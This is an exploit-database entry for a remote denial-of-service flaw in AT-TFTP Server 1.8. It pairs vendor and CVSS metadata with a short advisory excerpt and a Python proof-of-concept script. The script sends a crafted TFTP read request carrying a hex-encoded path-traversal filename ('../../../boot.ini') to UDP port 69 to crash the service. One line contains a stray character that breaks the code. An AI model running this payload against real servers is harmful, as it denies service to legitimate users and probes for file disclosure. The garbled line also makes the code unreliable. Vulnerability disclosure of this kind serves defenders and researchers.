header-logo
Suggest Exploit
vendor:
AT-TFTP
by:
Antu Sanadi
7.5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: AT-TFTP
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: No
Related CWE:
CPE: a:at-tftp_project:at-tftp:1.8
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Remote Denial-of-Service Vulnerability in AT-TFTP

The vulnerability allows remote attackers to crash the AT-TFTP application, denying service to legitimate users.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47561/info

AT-TFTP is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

AT-TFTP 1.8 is affected; other versions may also be vulnerable. 

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference : 
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

addr = (host,port)1

data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))